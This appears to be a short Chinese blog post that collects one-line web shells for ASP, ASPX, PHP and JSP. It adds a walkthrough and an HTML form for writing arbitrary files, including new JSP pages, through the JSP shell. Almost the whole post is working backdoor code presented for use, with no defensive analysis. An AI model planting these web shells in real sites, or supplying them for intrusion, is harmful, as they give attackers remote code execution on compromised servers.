一句话安全

asp一句话:<%eval request("1.2.3")%>

aspx一句话:<%@ Page Language="Jscript"%><%eval(Request.Item["1.2.3"])%>

php一句话:<?php eval($_POST[1.2.3])?>

jsp一句话:<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>

分析如下:

保存为1.jsp

访问:http://localhost/1.jsp?f=1.txt&t=1.2.3

访问:http://localhost/1.txt

输出:1.2.3

客户端

<form action="http://localhost/1.jsp?f=1.2.3.jsp" method="post">
<textarea name="t" cols="50" rows="50"></textarea><br>
<input type="submit" value="submit">
</form>

posted on 2016-08-23 13:24  milantgh  阅读(393)  评论(0编辑  收藏  举报
Copyright © 2024 milantgh
Powered by .NET 8.0 on Kubernetes Powered By: 博客园